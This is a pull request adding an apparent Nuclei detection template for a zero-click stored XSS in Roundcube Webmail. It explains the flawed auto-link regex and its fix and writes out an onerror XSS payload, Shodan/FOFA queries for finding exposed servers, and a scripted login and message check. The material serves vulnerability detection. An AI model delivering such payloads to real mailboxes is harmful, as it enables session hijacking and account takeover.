### PR TITLE
Add CVE-2026-54433 for Roundcube Webmail XSS vulnerability

### DIFF
--- a/http/cves/2026/CVE-2026-54433.yaml
+++ b/http/cves/2026/CVE-2026-54433.yaml
@@ -1,0 +1,111 @@
+id: CVE-2026-54433
+
+info:
+  name: Roundcube Webmail - Zero-Click Stored XSS in Plain-Text Rendering
+  author: omarkurt
+  severity: critical
+  description: |
+    Roundcube Webmail before 1.6.17 and 1.7.x before 1.7.2 renders
+    plain-text message bodies by auto-linking bare email addresses via
+    rcube_string_replacer, which permits an optional mailto-style query
+    string using the pattern `(\?\S+)?`. Because `\S+` matches any
+    non-whitespace byte (including `<` and `>`), a crafted "address" such
+    as `a@a.co?]<img/src="x"/onerror=alert(document.domain)>` causes the
+    trailing HTML tag to be emitted unescaped as part of the auto-linked
+    `<a href="mailto:...">` fragment. The payload fires the instant an
+    authenticated victim opens or previews the message in plain-text mode
+    - no click, download, or further interaction is required. Fixed by
+    commit 4c278f4868c67b163567cae3d74e58d872913459, which narrows the
+    pattern to `(\?[^<>\s]+)?`.
+  impact: |
+    Any party able to deliver a single plain-text email to the victim's
+    mailbox achieves arbitrary JavaScript execution in the victim's
+    Roundcube session the moment the message is opened or previewed -
+    enabling session/cookie theft, mailbox exfiltration, further phishing
+    from the compromised account, and full account takeover, without the
+    victim clicking any link or taking any action beyond reading their
+    inbox.
+  remediation: |
+    Update Roundcube Webmail to 1.6.17 or 1.7.2 or later.
+  reference:
+    - https://roundcube.net/news/2026/07/05/security-updates-1.6.17-and-1.7.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54433
+    - https://github.com/roundcube/roundcubemail/commit/4c278f4868c67b163567cae3d74e58d872913459
+    - https://vulnerabletarget.com/VT-2026-54433
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10.0
+    cve-id: CVE-2026-54433
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: roundcube
+    product: webmail
+    shodan-query: title:"Roundcube Webmail"
+    fofa-query: title="Roundcube Webmail"
+  tags: cve,cve2026,roundcube,webmail,xss,zero-click,stored
+ 
+variables:
+  user: "victim@vt-lab.local"
+  pass: "anything"
+
+flow: |
+  http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        GET /?_task=login HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        name: logintoken
+        part: body
+        regex:
+          - 'name="_token" value="([^"]+)"'
+        group: 1
+        internal: true
+
+  - raw:
+      - |
+        POST /?_task=login&_action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user={{rc_user}}&_pass={{rc_pass}}
+
+    cookie-reuse: true
+
+    matchers:
+      - type: status
+        status:
+          - 302
+        internal: true
+
+  - raw:
+      - |
+        GET /?_task=mail&_action=show&_mbox=INBOX&_uid=1&_extwin=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<img/src="x"/onerror=alert(document.domain)>'
+
+      - type: word
+        part: body
+        words:
+          - '&lt;img'
+        negative: true

--- a/http/cves/2026/CVE-2026-54433.yaml
+++ b/http/cves/2026/CVE-2026-54433.yaml
@@ -77,7 +77,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user={{user}}&_pass={{pass}}
-        
+
     cookie-reuse: true
 
     matchers:

--- a/http/cves/2026/CVE-2026-54433.yaml
+++ b/http/cves/2026/CVE-2026-54433.yaml
@@ -45,7 +45,7 @@ info:
     shodan-query: title:"Roundcube Webmail"
     fofa-query: title="Roundcube Webmail"
   tags: cve,cve2026,roundcube,webmail,xss,zero-click,stored
- 
+
 variables:
   user: "victim@vt-lab.local"
   pass: "anything"
@@ -76,8 +76,8 @@ http:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user={{rc_user}}&_pass={{rc_pass}}
-
+        _token={{logintoken}}&_task=login&_action=login&_timezone=UTC&_url=&_user={{user}}&_pass={{pass}}
+        
     cookie-reuse: true
 
     matchers:


### PR DESCRIPTION
Adds CVE-2026-54433 entry detailing a critical zero-click stored XSS vulnerability in Roundcube Webmail. Includes information on impact, remediation, and references.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

-  Added CVE-2026-54433
- References: https://vulnerabletarget.com/VT-2026-54433

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

 
<img width="1241" height="555" alt="Screenshot From 2026-07-23 00-24-28" src="https://github.com/user-attachments/assets/c9611c26-705e-40c8-bfe6-61ab2da434e8" />

